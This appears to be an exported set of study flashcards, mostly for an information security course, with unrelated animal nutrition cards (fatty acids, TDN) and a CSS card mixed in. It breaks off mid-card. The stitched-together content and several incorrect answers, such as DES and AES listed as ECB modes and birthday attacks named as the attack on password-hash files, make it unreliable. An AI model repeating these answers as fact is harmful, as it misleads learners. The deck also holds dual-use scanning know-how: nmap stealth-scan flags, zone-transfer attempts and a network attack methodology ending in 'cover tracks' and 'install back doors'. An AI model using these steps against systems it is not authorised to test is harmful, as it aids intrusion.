- Reactive password checking - Proactive password checking (as they create it)
Advantages of Knowledge-based authentication mechanisms e.g. passwords
- Readily accepted by users - Low cost implementation
Troubleshooting Common Security Issues: - Access Issues
- Recommended Password Selection Policy - Password Storage Policy (done by OS) - Least Privilege - Use Good Protocols such as Kerberos - Strong Authentication
People need to consider
- Recruiting - Monitoring - Education
Ipconfig / Ifconfig Flags: /releas
- Releases any Dynamically Assigned IP Addresses
(Property) ICT hardware and software need to consider
- Reliability and robustness - Redundancy - Source of software : authorised, legit, supported - Testing - Configuration/misconfiguration - Unprotected com channels : wired/wireless
ElGamal Cryptosystem
- Relies on difficulty of discrete logarithms for security - Used for encryption Ciphertext is: - twice length of plaintext --> C = 2P - randomised = multiple encryptions of same plaintext to produce different ciphertexts
ARP Flags: -d
- Removes a Listing from the arp cache
Ipconfig / Ifconfig Flags: /renew
- Renews the Dynamically Assigned IP Addresses
Disadvantages of clock based
- Requires synchronization - Need to allow for network delays if for network usage = attacker could copy password then log in as user.
For effective access control what do you need to consider?
- Resources - Sensitivity - Who/what should have access to each resource? - Permissions (Authorisations) - How will access control decisions be made? - Policy implementation
Security Technologies: - Firewalls
- Review the Firewall Logs on a Regular Basis - Windows Firewall Log is located at: (%windir%\system32\logfiles\ firewall\) - Turn on Logging - Open the Windows Firewall Console: (wf.msc and choose Actions > Properties) - Click Logging
RSA Cryptosystem
- Rivest-Shamir-Adleman cryptosystem - Use for encryption and digital signature scheme - Based on factorising large integers
nmap 192.168.1
- Scan IP Address 192.168.1
nmap 192.168.1.1-20
- Scan a Range of IP Addresses
nmap -O -PT -T1 192.168.1.1
- Scan to Detect OS, use TCP Scan, and use Sneaky Speed
Ipconfig / Ifconfig Flags: /all
- Shows all Information for all Network Interfaces
Types of Authentication:
- Single Factor - Multifactor - Biometric - Federations
What is disclosure?
- Snooping • Is unauthorized access to or interception of information • The practice is similar to eavesdropping but is not limited to gaining access to data • Can be unauthorized observance of data that belongs to someone else. • The unauthorized interception of information, is a form of disclosure. • It is passive, suggesting simply that some entity is listening to (or reading) communications or browsing through files or system information. • Wiretapping, or passive wiretapping, is a form of snooping in which a network is monitored.
[1.2] How can you address the security problems of Jeep Cherokee example?
- Software patches to address the vulnerability - During dev. implement a policy re: separate critical vehicle systems from entertainment/phone systems. - Education/training/awareness
[1.3] Why is the continued use of Windows XP after April 2014 considered a vulnerability?
- Software will no longer be patched = no repair of code errors. - Flaws identified by criminals can be used to attack system.
Authentication Systems or Methods are Based on One or More of these Five Factors:
- Something you know, such as a Password or PIN (Type I) - Something you have, such as a Smartcard, Token, or Identification Device (Type II) - Something you are, such as your Fingerprints, or Retinal Pattern (Biometrics) (Type III) - Something you do, such as an Action you must take to complete Authentication - Somewhere you are (This is based on Geolocation)
Who is the Commonwealth Privacy Act 1988 NOT applied to?
- State or Northern Territory government agencies - Non-government organisations.
What are block ciphers?
- Symmetric ciphers - Encrypted/Decrypted one block at a time - Blocks commonly 64-bits or 128-bits
Common Types of Protocol Analyzers:
- Tcpdump - Wireshark
Aircrack
- The Most Popular Tool - Free to Download - There are a Few Tools in the Download: wzcook.exe (will try to extract wireless data including the password, from the local machine on which it is installed; it is a command line tool)
Risk control is the examination and documenting of the security posture of an organization's information technology and the risks it faces.
False
There are four stages in a worm attack:
- The first stage is when the worm probes other machines looking for a vulnerability that can be exploited to copy itself to - The second stage is to penetrate the vulnerable machine by performing the operations for exploiting the vulnerability. • For example, the worm might detect an open network connection, through which it can get the remote machine to execute arbitrary instructions. - In the third stage, the worm will download itself to the remote machine, and store itself there. This is often called the 'persist' stage. - In the fourth stage, the worm will propagate itself by picking new machines to attempt to probe.
Importance of Cyber Security
- The internet allows an attacker to work from anywhere on the planet. - Risks caused by poor security knowledge and practice: IdentityTheft MonetaryTheft Legal Ramifications (for yourself and your organization) Sanctions or termination if policies are not followed. - According to the SANS Institute, the top vectors for vulnerabilities available to a cyber criminal are: *WebBrowser *Instant Messaging (IM) Clients #Instant messaging (IM) technology is a type of online chat that offers real-time text transmission over the Internet #WhatsUp, Viber, etc. *WebApplications *ExcessiveUserRights *Socialmedia.
netstat
- The netstat Command is also a Part of Both Windows and Linux - Displays Current Network Connections
Netcraft.com
- This Provides Information about Websites including what OS they are running
Shodan.io
- This Site is a Vulnerability Search Engine - You can Search your own Network's Domain Name for Vulnerability
isc.sans.edu
- This is the SANS Institute Cyber Storm Center - Will Provide Information on Current Cyber Threats
Other Security Technologies: - File Integrity Checking
- Tripwire is a File and Directory Integrity Checker - Monitors a Designated Set of Files for any Changes - Used with System Files on a Regular Basis - Tripwire can Notify System Administrators of Corrupted or Tampered Files - Traditionally an Open Source Tool, but now is Commercial been Designed to be Free
Digital Signatures
- Unique to signer - Verifiable - Legally binding - Different for every document - Must be produced and verified by a machine Completely different to digitized signature
[4.3] Explain how role-based access control (RBAC) can be used to implement separation of duties.
- User can only take one role at a time. - Require users in 2 different roles to complete task, set access permissions of different roles to force separation.
Types of Authentication: - SFA (Single Factor Authentication)
- Username / Password Combination
Elliptic Curve Cryptography
- Uses algebraic group defined on a set of points on an elliptic curve
nslookup
- Verifying that the Machine can connect to the DNS Server - Then it Opens a Command Prompt wherein you can enter DNS-Related Commands - run: nslookup.exe, Is -d domain_name - A Zone Transfer is when you Attempt to get the DNS Server to Send you all of its Zone Information - A Properly Configured DNS Server will Refuse
[3.1] Difference vulnerabilities and threats
- Vulnerabilities = weaknesses in system protecting asset. - Threats = anything with potential to cause harm.
Vulnerability Scanners
- Vulnerability Scanners find and correct Vulnerabilities before an attacker finds them - Some Tools scan for General Vulnerabilities - Others Scan for WebPage Vulnerabilities, Configuration Vulnerabilities
Kerberos: - Use Explained (1)
- When using Kerberos, the User Authenticates to the KDC and is given a Ticket granting Ticket (TGT) - This Ticket is encrypted and has a Time Limit of Up to 10 Hours - The Ticket Lists the Privileges of that User (Much like a Token)
Vulnerability Scanners: Active Scanners
- Will Interact Directly with the Target Network - Nessus, MBSA, and OWASP ZAP
Troubleshooting Common Security Issues: - Common Configuration Issues (Limit Admin Access)
- Wireless Access Points have an Administrative Panel - This should be Accessible via a Physical Connection, not via Wireless
The majority of virus programs are designed to harm users, by
- corrupting their data or attacking the operating system itself, - providing an exploitable 'backdoor', giving attackers access to the computer.
Separation of duties (privileges)
- divide task up into series of steps - ensure steps performed by different entities - MOre than one entity is required to complete the task
Benefit of separation of duties
- no single entity is authorised to complete all steps in a critical task - Minimises error - harder for insiders to abuse
Possible access permissions that could be implemented?
- read (observe) - write (observe and alter) - execute (neither observe nor alter) - append (alter) - search
--------------------------------INCOMPLETE (slide 42)
----------------------------------------------
ASYMMETRIC---------------------------------------------
----------------------------------------------
Symmetric---------------------------------------------------------
--------------------------------------------------------------
Essential Nutrients
-All organisms require water. -Essential nutrients for animals are: •the energy sources •some of the amino acids •a subset of fatty acids •vitamins •certain minerals
Diethylstilbesterol -DES
-Synthetic estrogen used to prevent miscarriages in humans (1947) -found to be a carcinogen (1971) -Also used as a growth promotant in cattle (banned in 1979) -Human dose 1-5 mg/d -Beef tissue levels 10 ppb (10 μg / kg)
Cholesterol is a steroid
-critical for cell membranes -fat digestion-lipid transport -derivatives have essential functions in metabolism
Phishing: Counterfeit Email
. A seemingly trustworthy entity asks for sensitive information such as credit card numbers, login IDs, password, date of birth, via e-mail. • A criminal activity using social engineering techniques. • An attempt to acquire sensitive data, such as passwords and credit card details, by masquerading as a trustworthy person or business in an electronic communication. • Typically carried out using email or an instant message.
trust
. One party (trustor) is willing to rely on the actions of another party (trustee) • The trustor (voluntarily or forcedly) abandons control over the actions performed by the trustee. • As a consequence, the trustor is uncertain about the outcome of the other's actions • The uncertainty involves the risk of failure or harm to the trustor if the trustee will not behave as expected. • Trust means an act of faith; confidence and reliance in something that's expected to behave or deliver as promised. • It is a belief in the competence and expertise of others, such that you feel you can reasonably rely on them to care yours needs • We trust a system less if it gives us insufficient information about its expertise. • We trust a system less when we don't have much control over our assets.
Spoofing examples
. Spammers can attack a mail system by changing the information stored in email 'envelopes' which enclose the messages themselves. • This is known as 'spoofing' and allows a spammer to disguise their actual address by writing new addresses for the sender (such as replacing their own address with that of TrustedBank) and the destination for receipts. • Simple spoofing is now being challenged by technologies that allow genuine senders to authenticate messages which can be checked by the recipient's mail server, Internet service providers and companies have to buy far more bandwidth and storage than they will ever need for legitimate purposes.
Units
1 calorie (small "c")= heat to raise the temp. of 1 gram of water by 1°C. 1000 calories = 1 kilocalorie (kcal)(Calorie, large "C" = 1 kcal) Joule = -the energy transferred to an object when a force of one newton acts on that object through a distance of one meter (1 newton metreor N·m). -the energy dissipated as heat when an electric current of one ampere passes through a resistance of one ohm for one second.1 cal= 4.18 joules 1 joule = 0.239 cal BTU = the amount of heat required to raise the temperature of one pound of water through 1°F -(58.5°F -59.5°F) at sea level (30 inches of mercury)
3 Information security goals
1. Confidentiality 2. Integrity 3. Availability
Privacy Amendment (Enhancing Privacy Protection) Act 2012 has 13 Privacy Principles grouped into 5 parts. What are they?
1. Consideration of personal information privacy 2. Collection of personal information 3. Dealing with personal information 4. Integrity of personal information 5. Access to, and correction of, personal information
Remote SW attacks without User Action
1. DOS attack 2. DDOS attack
How do Asymmetric ciphers for confidentiality work?
1. Each user creates a public key / private key pair. 2. Public key shared with everyone. 3. Sender uses receivers public key to encrypt message. 4. Ciphertext sent to receiver. 5. Receiver decrypts ciphertext using their private key.
[5.1] Briefly describe the problems associated with reusable passwords.
1. Easy to share 2. Easy to forget 3. Users choose easy to guess passwords 4. Can't be written down 5. Don't provide non-repudiation
Types of Block ciphers
1. Electronic Code Book mode (ECB) a. Data Encryption Standard (DES) b. Advanced Encryption Standard (AES) 2. Cipher Block Chaining (CBC) 3. Output Feedback (OFB) 4. Cipher Feedback (CFB) 5. Galois Counter Mode (GCM) There are 12. We are concerned with ECB and CBC.
2 types of Authentication
1. Entity Authentication 2. Data origin authentication
Source of threats
1. External: unauthorized entities outside organisation. 2. Internal: authoris
Attacking the Network Methodology
1. Footprint 2. Scan 3. Enumerate 4. Penetrate 5. Attack 6. Cover Tracks 7. Install back doors
[4.4] Policy enforcement phase. Explain these three steps in the order they must occur.
1. Identification (requester claims an identity) 2. Authentication (verify requester) 3. Verification authorisation (check identity authorised)
What are the steps for implementing access control?
1. Identify the subject (who are you claiming to be?) 2. Authenticate the subject (evidence) 3. Verify that the subject is authorized for the requested mode of access before allowing access
What are the 3 sides of the Security Model? What is on each side?
1. Information States (top) . Transmission . Storage . Processing 2. Critical Information Security Services (left) . Confidentiality . Integrity . Availability 3. Security Measures (right) . Technology . Policy & Practices . Education, Training and Awareness
Authenticator Categories
1. Knowledge-Based (something yo know) 2. Object-based (something yo do) 3. ID-based (something yo are) 4. Location-based (somewhere yo are)
[9.6] Ransomware such as CryptoLocker uses encryption to encrypt the files on a victim's computer, then demands that they pay a random to be able to decrypt their files. Explain what happens after the CryptoLocker malware is installed.
1. Malware contacts a control server which generates a 2048-bit RSA public/private key pair. 2. Control server sends public key to victims computer and keeps private key. 3. Malware encrypts files on computer using public key. 4. When enough files are encrypted it displays message asking user to pay ransom.
2 Types of Attacks
1. Passive 2. Active
[5.7] Describe the 3 practical aspects that need to be considered for implementing a biometric system.
1. Performance: accuracy + speed 2. Acceptability: extent people accept the use of the biometric identifier. 3. Circumvention: how easily system is fooled using fraudulent efforts.
Process of enctyption for Vernam OTP
1. Plaintext encrypted character by character. 2. t converted to ascii 8-bit binary string (encoding). 3. Encryption key for the first character is 8-bit secret string. Encryption algorithm is XOR. 8-bit ciphertext string also = ASCII symbol
What are the two phases of implementing access control?
1. Policy definition phase: where privilege is allocated and administered a) Authorise subject by defining the AC policy b) Distribute access credentials/token to subject c) Change/revoke authorisation whenever necessary 2. Policy enforcement (grant access) phase: where privilege is required to gain access a) Authenticate subject b) Grant access as authorised by policy c) Monitor access
3 Types of Countermeasures
1. Preventative controls 2. Detective controls 3. Corrective controls
Types of Assets
1. Property - Physical assets e.g. buildings and contents - Hardware - Software (OS, apps, support systems) - Data 2. People - Employees - Contractors - Customers/Clients 3. Procedures
How are public keys distributed?
1. Provided directly e.g. in email signature 2. On a website 3. Public keyserver
What are the most common digital signature schemes?
1. RSA 2. DSA 3. ECDSA
Two inputs used for most modern stream ciphers
1. Secret key 2. IV (Known Initialisation Vector)
[5.6] Describe 4 main biometric modules
1. Sensor module: capturs biometric signal e.g. fingerprint scanner. 2. Feature extraction module: processes signal and extracts discriminatory features e.g. position of ridges on fingers. 3. Matcher module: compares against stored templates to generated matching score. 4. System database module: used to store biometric templates.
What are the advantages of Elliptic Curve Cryptography over other asymmetric cryptographies?
1. Smaller key size and smaller ciphertext size than RSA 2. Provides same level of security with smaller keys
Asset States
1. Storage - electronic, physical, human 2. Transmission - physical or electronic 3. Processing (use) - physical or electronic
What does the security of asymmetric cryptographic system depend on?
1. Strength of the algorithm 2. Key Size 3. Confidentiality of the private key (K_priv)
Issues with Binary Additive Stream Ciphers
1. Synchronisation: encryption keystream must be synchronised with encryption keystream. 2. Bitflip error: one bit will be decrypted incorrectly 3. Inserted/deleted bit: loss of synchronisation = message can't be recovered from insertion/deletion point.
Why is access control used?
1. To prevent unauthorized users from gaining access to resources. 2. To prevent authorised users from misusing resources.
Attacks by Programmer Developing a System
1. Trojan horse: hide in other programs reveal when activated 2. back door or trap door, usually a password that allows u to bypass security 3. Logic Bomb: segment of computer code embedded and designed to activate at certain time
[5.7] In order to be used for biometrics a characteristic must meet 4 requirements.
1. Universality: each person should have the characteristic. 2. Distinctiveness: characteristic should be significantly different between each person. 3. Permanence: characteristic should be sufficiently invariant over a period of time. 4. Collectability: characteristic should be measured quantitatively.
[5.2] Explain how how authentication is performed for hashed passwords.
1. User sends UserID and password 2. Server computes hash value of received password 3. Look up record for that UserID, a. Compare computed hash value with stored hash value b. If they match, access is permitted
Remote SW attacks Requiring User Action
1. Virus: segment of code that performs malicious actions by attaching to another program 2. Worm: same as virus but can replicate itself without requiring another comp. program 3. Phishing Attack (and spear)
risk analysis steps
1. asses vale of each asset 2. estimate probability of each asset will be compromised 3. compare costs of asset being compromised to cost of protecting asset
Attacking a web server
1. identify all entry points 2. examine the structure of entry points 3. Are there non-HTTP ways of communicating with the server 4. identify server software 5. enumerate 6. research for known vulnerabilities
Risk mitigation
1. implement control to prevent identified threats from occuring 2. developing means of recovery methods: acceptance, limitation and transference
[9.1] How many keys are required for five people to communicate confidentially using a symmetric cipher, such that any two can communicate securely?
10. Person A needs 4 keys to communicate with the others. There are 5 people --> 5 x 4 = 20. But the key Person B uses to communicate with Person A is the same so --> 20/2 = 10.
The Children's Online Privacy Protection Act (COPPA) restricts the collection of information online from children. What is the cutoff age for COPPA regulation?
13
Unsaturated Fatty Acids -all "cis"
16 Carbons: -Palmitate 16:0 Melting Point 63 -Palmitoleic C 16:1 Melting Point 1.5 !8 Carbons Stearate 18:0 Melting Point 71.5 Oleic 18:1 Melting Point 16.3 Linoleic 18:2 Melting Point -5.0 Linolenic 18:3 Melting Point -11 20 Carbons Arachidic(eicosanoic) 20:0 Melting Point 75.5 Gadoleic 20:1 Melting Point 25 Arachidonic(eicosatetraenoic) 20:4 Melting Point -49.5 adding double bonds -decreases the melting point (solid → liquid)
Common Long Chain Fatty Acids
16:0 Palmitic acid 18:0 Stearic acid 18:1 n-9Oleic acid 18:2 n-6 Linoleic acid 18:3 n-3α-Linolenic acid Δ 9,12, 15 18:3 n-6γ-Linolenic acid Δ 6,9,12 20:4 n-6 Arachidonic acid 20:5 n-3Eicosapentaenoic acid (EPA) 22:6 n-3Docosahexaenoic acid (DHA
who are the individuals that are hit hard by ID theft?
18 & 19 year olds
Discovery of CLA
1961: First report that CLA was an intermediate in microbial biohydrogenation in the rumen. 1979: A compound in fresh and fried ground beef that was anti-mutagenic in the Ames test. 1985: The mutagenesis inhibitor was an anticarcinogen in mice. 1987: The anticarcinogen was CLA. 1990's: synthetic CLA produced. 1997+ Synthetic CLA reduced body fat in mice, rats, pigs, etc...
[7.2] What port is reserved for HTTP over TLS? What is the prefix for a URL that describes a resource accessible by HTTP over TLS?
443. https://
Bob is using a port scanner to identify open ports on a server in his environment. He is scanning a web server that uses Hypertext Transfer Protocol (HTTP). Which port should Bob expect to be open to support this service?
80
Whaling
A Phishing attack that targets only wealthy individuals.
What does Call forwarding look like?
A cybercriminal gets the phone company to forward our client's cell number to their cell phone so they can impersonate our client when we, or any other financial institution our client conducts business with, calls them back for verification before transferring funds or opening accounts.
b. verify the receiver
A digital signature can provide each of the following benefits EXCEPT _____________. a. prove the integrity of the message b. verify the receiver c. verify the sender d. enforce nonrepudiation
Hoax
A false warning designed to trick users into changing security settings on their computer.
unsaturated fatty acid
A fatty acid possessing one or more double bonds between the carbons in the hydrocarbon tail Typically methylene-interrupted 20:5 Δ 5, 8, 11, 14, 17 20:5 omega 3
Spyware
A general term used to describe software that spies on users by gathering information without consent.
[6.1] According to Section 6 of the Australian Privacy Act 1988, what is not a record?
A generally available publication or anything kept in library, art gallery, museum for purposes of reference, study or exhibition. Records in care of National Archives of Aust., documents in Aust. War Memorial collection, letters/articles in transmission by post.
Botnet
A logical computer network of zombies under the control of an attacker.
Watering Hole Attack
A malicious attack that is directed toward a small group of specific individuals who visit the same website.
Worm
A malicious program designed to enter a computer via a network to take advantage of a vulnerability in an application or an operating system.
Pharming
A phishing attack that automatically redirects the user to a fake site.
Spear Phishing
A phishing attack that targets only specific users.
Vishing
A phishing attack that uses a telephone calls instead of emails.
Rootkit
A set of software tools used by an attacker to hide the actions or presence of other types of malicious software.
Information Security Incident
A single or a series of unwanted or unexpected information security events that have a significant probability of compromising business operations and threatening information security.
Impersonation
A social engineering attack that involves masquerading as a real or fictions character and then playing out the role of that person on a victim.
Adware
A software program that delivers advertising content in a manner that is unexpected and unwanted by the user.
Total Digestible Nutrients (TDN)
A standard evaluation of the nutritional merit of a particular feed for farm animals which includes all the digestible organic nutrients--protein, fiber, nitrogen-free extract, and lipids. "An outmoded method of expressing the energy value of a feed" used many in horse, beef, dairy nutrition. TDN = digestible Crude Protein + digestible NFE+ digestible Crude Fiber + 2.25 x digestible ether extract TDN is expressed as: -a percentage of the ration -or as lbs or kg of TDN (not as a caloric value)
Threat Model
A threat model is a diagram and description that tells a story of how an attacker could exploit the vulnerability. This is a narrative approach to the attack that should help guide the mitigation techniques that need to be put in place to protect the system at that point. It can define the security of an application and reduces the number of vulnerabilities. It also has the 2 steps of identifying and prioritizing the vulnerabilities. Assumption about the adversary • Capability of the adversary, the knowledge of the adversary... - Assumption about the legitimate users • Choose strong password, will not send their password in email,.... - Assumptions about the certificate authorities • They are trustworthy, perfectly secure...
Spim
A variation of spam, which targets instant messaging users instead of email users.
How does heuristic detection detect a Virus
A virtualized environment is created and the code is executed in it
Armored Virus
A virus that goes to great lengths in order to avoid detection.
How does heuristic detection detect a virus?
A virutalised environment is created and the code is executed in it.
b. digest
A(n) ______________ is not decrypted but is only used for comparison purposes. a. stream b. digest c. algorithm d. key
What type of controls are the processes for developing and ensuring that policies and procedures are carried out?
Administrative controls
What type of controls are the processes for developing and insuring that policies and procedures are carried out?
Administrative controls
____ is simply how often you expect a specific type of attack to occur.
ARO
The ____ strategy is the choice to do nothing to protect a vulnerability and to accept the outcome of its exploitation.
Accept Control
Discretionary Access Control (DAC)
Access at the discretion of some individual, possibly the information asset owner. - Popular OS use DAC - Often implemented access control lists or matrices.
Which one of the following is the best example of an authorization control?
Access control lists
Blacklists
Access generally permitted unless expressly forbidden. - If your name is on the list you will be denied access. - the sites you are not permitted to visit
Whitelist
Access is generally forbidden unless expressly permitted. - if your name is on the list you will be granted access - the only sites you are permitted to visit.
Role-based access control (RBAC)
Access permissions based on the role of the individual rather than the subject's identity (user, admin, student etc.)
[1.2] Were the Jeep Cherokee attacks active or passive?
Active attacks: constructed code and deliberately inserted it into system.
Subjects
Active entities in the system (for example users, processes, other computers), that cause information to flow among objects or change the system state.
Internet (network) layer
Addressing and routing. Global. - IPv4, IPv6 - ICMP : control - IPsec : security
Transport Layer Security (TLS)
Adds encryption to application protocols. Used extensively on the web and is often referred to in privacy policies as a means of providing confidential web connections. Network security protocol.
[5.4] Describe one major advantage and one major disadvantage for hardware tokens, when compared to standard user-selected passwords.
Advantage: single use (one time) password is secure against password guessing or replay: reusable passwords are not. Disadvantage: problems if synchronisation between token and host is lost, also security issues around possible loss or theft of token.
[9.4] Alice wants to send a message and an associated digital signature to Bob. Alice has a public key K_(Apub) and the associated private key K_(Apriv). Similarly, Bob has a public key and associated private key. Explain the cryptographic steps necessary for Alice to generate her digital signature and for Bob to verify Alice's digital signature using hashing.
Alice's signature generation: i. Alice prepares message M (hashes the message). ii. Alice inputs the hashed message and Alice's private key to the signature creation algorithm to obtain SigA(M). iii. Alice sends SigA(M) and M to Bob Bob performing signature verification: i. Bob receives message M and claimed signature SigA(M). ii. Bob hashes message M iii. Bob inputs SigA(M), M' and Alice's public key into signature verification algorithm. iii. If output = Yes then SigA(M) = signature on message M formed by Alice. If hash function collision resistant then highly likely message same as sent by Alice. If output = No, then no assurance that the signature on the message was formed by Alice or that the hash was right.
[9.4] Alice wants to send a message and an associated digital signature to Bob. Alice has a public key K_(Apub) and the associated private key K_(Apriv). Similarly, Bob has a public key and associated private key. Explain the cryptographic steps necessary for Alice to generate her digital signature.
Alice's signature generation: i. Alice prepares message M (may include encoding the message). ii. Alice inputs the message and Alice's private key to the signature creation algorithm to obtain SigA(M). iii. Alice sends SigA(M) and M to Bob
Digital Certificate
Also called an SSL certificate, is a type of electronic business card that is attached to internet transaction data to verify the sender of data
[9.6] Ransomware such as CryptoLocker uses encryption to encrypt the files on a victim's computer, then demands that they pay a random to be able to decrypt their files. According to the "Takedown and recovery of files" investigators were able to takeover the control servers of CryptoLocker and shut them down. How were users able to decrypt their files after that?
An IT security firm gained access to the database of RSA private keys that the CryptoLocker operators had stored, and made available a tool to help victims decrypt their files. (Note that this decryption service is no longer in operation.) For each file to be encrypted, one would generate a random AES key, encrypt the file using AES, encrypt the AES key using the RSA public key, and then delete the AES key. This would be much faster since the user's files are being encrypted using the faster AES encryption algorithm. Users would still be unable to decrypt their files since the AES key has been deleted and the only way to recover the AES key is to decrypt it using the RSA private key.
Bot Herder
An attacker who controls a botnet.
Intrusions
An attempt to gain unauthorised access to your system
Trojan Horse
An executable program that is advertised as performing one activity but which actually performs malicious activity.
Information Security Event
An identified occurrence of a system, service or network state indicating a possible breach of information security policy or failure of safeguards, or a previously unknown situation that may be security relevant.
Zombie
An infected computer that is under the remote control of an attacker.
Cryptanalysis
Analysis of cryptographic systems, inputs and outputs to derive confidential information, usually without using secret knowledge.
Biochemical Basis
Animals Have: Δ -4, Δ -5, Δ -6, Δ -9 desaturase enzyme Stearate to oleate = Δ -9 desaturase Cats lack Δ -6 desaturase To make: Linoleic Acid (18:2 Δ 9,12), need Δ -12 desaturase Linoleic Acid (18:3 Δ 9,12,15), need Δ -12 and Δ -15 desaturase
Essential fatty acids conversion
Animals can insert double bonds after carbon # 4 -9 and they can add 2 carbon units. •Stearic can be made into oleic. •Linoleic can be made into arachidonic. •Cannot convert oleic to linoleic or linolenic. •Fatty acids always stay in the same family (omega-3 or omega-6)
Worms
Another type of self-replicating malware is the worm; like a virus it is designed to make copies of itself; • Unlike a virus, a worm is a standalone application • Worms spread through network connections, accessing uninfected machines and then hijacking their resources to transmit yet more copies across the network. Worms were invented as a curiosity and have even been suggested as ways of testing networks or distributing software patches across a network; • Even the most 'benign' worm consumes resources and can affect the performance of a computer system.
Hoe botnet is created?
Botnets are created using malware that gives an attacker control over a group of computers and commonly use them to gather information from the computers (e.g., usernames and passwords), Botnets spread through viruses and worms
[9.3] Alice wants to send a confidential message to Bob. They do not have an existing shared secret key. Suppose that Alice and Bob agree to use an asymmetric cipher (RSA). Bob has a public key K_(Bpub) and the associated private key K(Bpriv). What should Bob do with each of these keys to permit people to send confidential messages to him?
Bob should keep his private key K_(Bpriv) secret and make is public key K_(Bpub) public.
Benefits of CLA:
Anti-carcinogenic Anti-obesity Anti-atherogenic Immunomodulatory
Protecting Fat From Oxidative Damage
Antioxidants -Natural: (work in vivo) •Vitamin E •Vitamin A •Citric Acid •Ascorbic Acid Feed antioxidants (added to the feed or fat) •Ethoxyquin (Santoquin) •BHA (butylated hydroxyanisole) •BHT (butylated hydroxytoluene) •TBHQ (tertiary butlyatedhydroquinone) Antioxidants Added to Feed to Protect Against Oxidative Damage to Lipids
Risk ____ defines the quantity and nature of risk that organizations are willing to accept as they evaluate the tradeoffs between perfect security and unlimited accessibility.
Appetite
Important actions of Eicosanoids
Arachidonic -> Eicosanoids -conversion blocked by aspirin, tylenol, NSAIDS etc.. -inhibit gastric acid secretion -involved in inflammation, pain, body temp -blood pressure, blood clotting -cause smooth muscle contraction --Lutalyse F2a ---induce parturition: sows ---synchronize estrous: cattle, horses
RELATIONSHIP OF CRUDE FIBER TO ENERGY LEVEL (TDN) IN FEED
As Crude Fiber or ADF increases, TDN Decreases
Certificate
Assertion by a trusted third party that a particular public key belongs to a particular entity.
You can assess the relative risk for each of the vulnerabilities by a process called risk ____________________.
Assessment
____________________ are defined as information and the systems that use, store, and transmit information.
Assets
Which is better for key distribution: Symmetric or Asymmetric ciphers?
Asymmetric ciphers. Anyone may know the public key and everyone has their own private key whereas there is only one shared key for symmetric ciphers.
Man-in-the-Middle Attack (MITM)
Attacker positions self between two entities.
Phishing
Attempts to gain credentials to enable access to other resources by masquerading as a legitimate organisation. Usually involves spoofing and social engineering.
[1.4] What is the full name of the organization known as AusCERT?
Australian Computer Emergency Response Team.
[6.1] Which organisations does the Australian Privacy Act 1988 apply to?
Australian Federal government agencies and ACT government agencies
Malware
Automated attacks designed to exploit common vulnerabilities
Cost ____________________ is the process of preventing the financial impact of an incident by implementing a control.
Avoidance
What criteria must the key of a Vernam OTP meet?
Must be: 1. TRULY Random 2. Same length as message 3. Used only once
Botnet is used for what?
Botnets are primarily used to launch attacks against other computers - flood the internet with spam messages - commit fraud against advertisers, and - perform so-called distributed denial of service attacks on companies and governments.
Omega-3 vs Omega-6
Both are polyunsaturated -Omega-6 is high in corn and soy oil -Omega-3 is high in flax (18:3) and fish oil (EPA and DHA). •Omega-3 are made into eicosanoids that are less inflammatory •Omega-3 are needed for brain development •Typical ω-6/ω-3 ratio in our diet is greater than 10 •Should be less than 3
Cipherspec message
Client must send to server. server must return to client. on client receipt, use the previously agreed ciphers and keys from then on
Clock-based tokens
Clock time used as input algorithm. Token and Host clock must be synced.
What does Credential Replay look like?
Cybercriminals hope to access a few accounts by using a large cache of stolen login credentials to access a firm's online accounts.
How do you insert a background image into a web page?
Background images are specified in the CSS style sheet. Choose your selector in the CSS designer panel and go to the background properties. There, you will be able to click the folder for the background-image property.
Which of the following is NOT designed to prevent individuals from entering sensitive areas but instead is intended to direct traffic flow?
Barricade
A(n) ____________________ is a "value or profile of a performance metric against which changes in the performance metric can be usefully compared."
Baseline
HTTP authentication methods
Basic: browser sends username+password using base64 encoding, security through obscurity. Digest: Hashes credentials with MD5, hashes password URI and timestamp. MD5 is a poor hash, vulnerable to dictionary attacks.
____________________ is the process of seeking out and studying the practices used in other organizations that produce results you would like to duplicate in your organization.
Benchmarking
What is an alternative to using Vername OTP?
Binary additive stream ciphers that don't use TRULY random binary sequence and instead use KEYSTREAM GENERATOR.
Which password attack is typically used specifically against password files that contain cryptographic hashes?
Birthday attacks
[9.4] Alice wants to send a message and an associated digital signature to Bob. Alice has a public key K_(Apub) and the associated private key K_(Apriv). Similarly, Bob has a public key and associated private key. Explain the cryptographic steps necessary for Bob to verify Alice's digital signature.
Bob performing signature verification: i. Bob receives message M and claimed signature SigA(M). ii. Bob inputs SigA(M), M and Alice's public key into signature verification algorithm. iii. If output = Yes then SigA(M) = signature on message M formed by Alice. If output = No, then no assurance that the signature on the message was formed by Alice.
Would you use Vernam OTP to ensure C,I or A?
Confidentiality. - attacker can try all possible keystreams to recover all possible plaintext but has no way to know which is correct.
[3.4] An organization sells their used photocopier at auction without first removing the stored data from the hard drive. Which information security goal will potentially be breached if this data is exposed?
Breach of confidentiality. The original assets are presumably retained by the company. The material on the hard drive is a copy of the originals, but if exposed the information is no longer confidential.
Nuke: Teardrop Attack
Breaks messages into fragments then send packet fragments can't be reconstructed. Target cannot rebuild messages, panics and dies.
Tom is the IT manager for an organization that experienced a server failure that affected a single business function. What type of plan should guide the organization's recovery effort?
Business Continuity Plan (BCP)
Of the three types of mitigation plans, the _________________________ plan is the most strategic and long term.
Business Continuity or BC
Which of the following is not a characteristic of an alarmed carrier PDS?
Periodic visual inspections
biometric device
authenticates person's identity using personal characteristic... fingerprint, face
access controls
authentication and authorization
preventive control
avoid incident from occuring
C-R token systems
Challenge Response systems. - User request access - System sends challenge - User types challenge in device - User sends display response to host
A(n) ____________________ desk policy requires that employees secure all information in appropriate storage containers at the end of each day.
Clean
Overriding an employee's security ____________________ requires that the need-to-know standard be met.
Clearance
[7.1] Explain how SSH provides server-to-client authentication and client-to-server authentication.
Client authentication: - Public keys, harder to guess - Can associate several keys with single account/computers.
The formal decision making process used when considering the economic feasibility of implementing information security controls and safeguards is called a(n) ____.
CBA
Cross-site request forgery
CSRF is an attack that tricks the victim into submitting a malicious request. It inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf.
_______________ can be used to secure a mobile device.
Cable lock
CSS
Cascading Style Sheets
Measures of Fat Quality
Chain length -Saponification number -Fatty acid profile •Unsaturation -Melting point, titer, hardness (also influenced by chain length) -Iodine value -fatty acid profile: P/S, U/S ratio Stability -Peroxide value -TBARS (measure of rancidity) Moisture, Impurities, Unsaponifiables (MIU) Free fatty acid level
[5.4] Compare the two token-based methods (clock based or counter based). What is a possible advantage of each compared with the other?
